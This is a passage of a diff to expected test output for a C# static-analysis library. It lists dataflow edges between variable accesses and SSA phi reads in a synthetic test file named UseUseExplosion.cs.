UseUseExplosion.cs:24:2297:24:2297 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2308:24:2313 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2308:24:2313 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2308:24:2313 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2312:24:2312 | access to local variable x | UseUseExplosion.cs:24:2308:24:2313 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2323:24:2328 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2323:24:2328 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2312:24:2312 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2323:24:2328 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2323:24:2328 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2323:24:2328 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2327:24:2327 | access to local variable x | UseUseExplosion.cs:24:2323:24:2328 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2338:24:2343 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2338:24:2343 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2327:24:2327 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2338:24:2343 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2338:24:2343 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2338:24:2343 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2342:24:2342 | access to local variable x | UseUseExplosion.cs:24:2338:24:2343 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2353:24:2358 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2353:24:2358 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2342:24:2342 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2353:24:2358 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2353:24:2358 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2353:24:2358 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2357:24:2357 | access to local variable x | UseUseExplosion.cs:24:2353:24:2358 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2368:24:2373 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2368:24:2373 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2357:24:2357 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2368:24:2373 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2368:24:2373 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2368:24:2373 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2372:24:2372 | access to local variable x | UseUseExplosion.cs:24:2368:24:2373 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2383:24:2388 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2383:24:2388 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2372:24:2372 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2383:24:2388 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2383:24:2388 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2383:24:2388 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2387:24:2387 | access to local variable x | UseUseExplosion.cs:24:2383:24:2388 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2398:24:2403 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2398:24:2403 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2387:24:2387 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2398:24:2403 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2398:24:2403 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2398:24:2403 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2402:24:2402 | access to local variable x | UseUseExplosion.cs:24:2398:24:2403 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2413:24:2418 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2413:24:2418 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2402:24:2402 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2413:24:2418 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2413:24:2418 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2413:24:2418 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2417:24:2417 | access to local variable x | UseUseExplosion.cs:24:2413:24:2418 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2428:24:2433 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2428:24:2433 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2417:24:2417 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2428:24:2433 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2428:24:2433 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2428:24:2433 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2432:24:2432 | access to local variable x | UseUseExplosion.cs:24:2428:24:2433 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2443:24:2448 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2443:24:2448 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2432:24:2432 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2443:24:2448 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2443:24:2448 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2443:24:2448 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2447:24:2447 | access to local variable x | UseUseExplosion.cs:24:2443:24:2448 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2458:24:2463 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2458:24:2463 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2447:24:2447 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2458:24:2463 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2458:24:2463 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2458:24:2463 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2462:24:2462 | access to local variable x | UseUseExplosion.cs:24:2458:24:2463 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2473:24:2478 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2473:24:2478 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2462:24:2462 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2473:24:2478 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2473:24:2478 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2473:24:2478 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2477:24:2477 | access to local variable x | UseUseExplosion.cs:24:2473:24:2478 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2488:24:2493 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2488:24:2493 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2477:24:2477 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2488:24:2493 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2488:24:2493 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2488:24:2493 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2492:24:2492 | access to local variable x | UseUseExplosion.cs:24:2488:24:2493 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2503:24:2508 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2503:24:2508 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2492:24:2492 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2503:24:2508 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2503:24:2508 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2503:24:2508 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2507:24:2507 | access to local variable x | UseUseExplosion.cs:24:2503:24:2508 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2518:24:2523 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2518:24:2523 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2507:24:2507 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2518:24:2523 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2518:24:2523 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2518:24:2523 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2522:24:2522 | access to local variable x | UseUseExplosion.cs:24:2518:24:2523 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2533:24:2538 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2533:24:2538 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2522:24:2522 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2533:24:2538 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2533:24:2538 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2533:24:2538 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2537:24:2537 | access to local variable x | UseUseExplosion.cs:24:2533:24:2538 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2548:24:2553 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2548:24:2553 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2537:24:2537 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2548:24:2553 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2548:24:2553 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2548:24:2553 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2552:24:2552 | access to local variable x | UseUseExplosion.cs:24:2548:24:2553 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2563:24:2568 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2563:24:2568 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2552:24:2552 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2563:24:2568 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2563:24:2568 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2563:24:2568 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2567:24:2567 | access to local variable x | UseUseExplosion.cs:24:2563:24:2568 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2578:24:2583 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2578:24:2583 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2567:24:2567 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2578:24:2583 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2578:24:2583 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2578:24:2583 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2582:24:2582 | access to local variable x | UseUseExplosion.cs:24:2578:24:2583 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2593:24:2598 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2593:24:2598 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2582:24:2582 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2593:24:2598 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2593:24:2598 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2593:24:2598 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2597:24:2597 | access to local variable x | UseUseExplosion.cs:24:2593:24:2598 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2608:24:2613 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2608:24:2613 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2597:24:2597 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2608:24:2613 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2608:24:2613 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2608:24:2613 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2612:24:2612 | access to local variable x | UseUseExplosion.cs:24:2608:24:2613 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2623:24:2628 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2623:24:2628 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2612:24:2612 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2623:24:2628 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2623:24:2628 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2623:24:2628 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2627:24:2627 | access to local variable x | UseUseExplosion.cs:24:2623:24:2628 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2638:24:2643 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2638:24:2643 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2627:24:2627 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2638:24:2643 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2638:24:2643 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2638:24:2643 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2642:24:2642 | access to local variable x | UseUseExplosion.cs:24:2638:24:2643 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2653:24:2658 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2653:24:2658 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2642:24:2642 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2653:24:2658 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2653:24:2658 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2653:24:2658 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2657:24:2657 | access to local variable x | UseUseExplosion.cs:24:2653:24:2658 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2668:24:2673 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2668:24:2673 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2657:24:2657 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2668:24:2673 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2668:24:2673 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2668:24:2673 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2672:24:2672 | access to local variable x | UseUseExplosion.cs:24:2668:24:2673 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2683:24:2688 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2683:24:2688 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2672:24:2672 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2683:24:2688 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2683:24:2688 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2683:24:2688 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2687:24:2687 | access to local variable x | UseUseExplosion.cs:24:2683:24:2688 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2698:24:2703 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2698:24:2703 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2687:24:2687 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2698:24:2703 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2698:24:2703 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2698:24:2703 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2702:24:2702 | access to local variable x | UseUseExplosion.cs:24:2698:24:2703 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2713:24:2718 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2713:24:2718 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2702:24:2702 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2713:24:2718 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2713:24:2718 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2713:24:2718 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2717:24:2717 | access to local variable x | UseUseExplosion.cs:24:2713:24:2718 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2728:24:2733 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2728:24:2733 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2717:24:2717 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2728:24:2733 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2728:24:2733 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2728:24:2733 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2732:24:2732 | access to local variable x | UseUseExplosion.cs:24:2728:24:2733 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2743:24:2748 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2743:24:2748 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2732:24:2732 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2743:24:2748 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2743:24:2748 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2743:24:2748 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2747:24:2747 | access to local variable x | UseUseExplosion.cs:24:2743:24:2748 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2758:24:2763 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2758:24:2763 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2747:24:2747 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2758:24:2763 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2758:24:2763 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2758:24:2763 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2762:24:2762 | access to local variable x | UseUseExplosion.cs:24:2758:24:2763 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2773:24:2778 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2773:24:2778 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2762:24:2762 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2773:24:2778 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2773:24:2778 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2773:24:2778 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2777:24:2777 | access to local variable x | UseUseExplosion.cs:24:2773:24:2778 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2788:24:2793 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2788:24:2793 | [input] SSA phi read(x) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2777:24:2777 | access to local variable x | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(x) | +| UseUseExplosion.cs:24:2788:24:2793 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:13:25:16 | access to property Prop | | UseUseExplosion.cs:24:2788:24:2793 | [post] this access | UseUseExplosion.cs:25:13:25:16 | this access | | UseUseExplosion.cs:24:2788:24:2793 | this access | UseUseExplosion.cs:25:13:25:16 | this access | -| UseUseExplosion.cs:24:2792:24:2792 | access to local variable x | UseUseExplosion.cs:24:2788:24:2793 | [input] SSA phi read(x) | -| UseUseExplosion.cs:24:2803:24:2808 | [input] SSA phi read(this.Prop) | UseUseExplosion.cs:25:9:25:3199 | SSA phi read(this.Prop) | -| UseUseExplosion.cs:24:2803:24:2808 | [input] SSA phi read(x) | 